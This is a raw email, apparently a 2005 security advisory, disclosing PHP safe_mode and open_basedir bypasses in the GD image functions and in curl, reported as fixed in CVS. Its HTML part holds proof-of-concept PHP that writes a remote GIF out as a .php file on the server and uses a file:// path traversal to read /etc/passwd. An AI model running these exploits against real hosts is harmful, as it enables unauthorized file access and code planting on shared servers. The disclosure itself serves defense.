------=_Part_12857_14117620.1129582526565 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline There is a vulnerability (Safedir Restriction Bypass) identified within the GD extension affecting the following functions: - imagegif() - imagepng() - imagejpeg() in /ext/gd/gd.c line 1647 Which is now fixed in the cvs http://cvs.php.net/co.php/php-src/ext/gd/gd.c?r=3D1.312.2.1#1786 POC: with an image like http://81.57.125.106/~slythers/file.gif curl openbasedir and safemode bypass. POC: As you notice, we can bypass the safedir which leads to access to any files on any shared servers. This is fixed in the cvs. slythers@gmail.com greets: david coallier ------=_Part_12857_14117620.1129582526565 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline
There is a vulnerability (Safedir Restriction Bypass) identified = within the GD extension affecting
the following functions:
- imagegif= ()
- imagepng()
- imagejpeg()

in /ext/gd/gd.c  line 1647<= br>
Which is now fixed in the cvs
http://cvs.php.net/co.= php/php-src/ext/gd/gd.c?r=3D1.312.2.1#1786
POC:

with an image like http://81.57.125.106/~slythers/f= ile.gif
<?php
    $im =3D imagecreatefrom= gif("file.gif");
    imagegif($im, '/var/www/f34r.fr= /c/f/elbossoso/.i.need.money.php');
?>


curl openbas= edir and safemode bypass.
POC:

<?php

mkdir("./".$_SERVER["SCRIPT_NAME"]."?");$ch =3D curl_init("file://&= quot;.$_SERVER["SCRIPT_FILENAME"]."?/../../../../../../../..= /../../../etc/passwd ");

$file=3Dcurl_exec($ch);

echo $file;

?>

As you notice, we can bypass the safedir which leads to access to any
files on any shared ser= vers.

This is fixed in the cvs.
 
slythers@gmail.com
greets: david coallier <davidc@ph= p.net>
------=_Part_12857_14117620.1129582526565--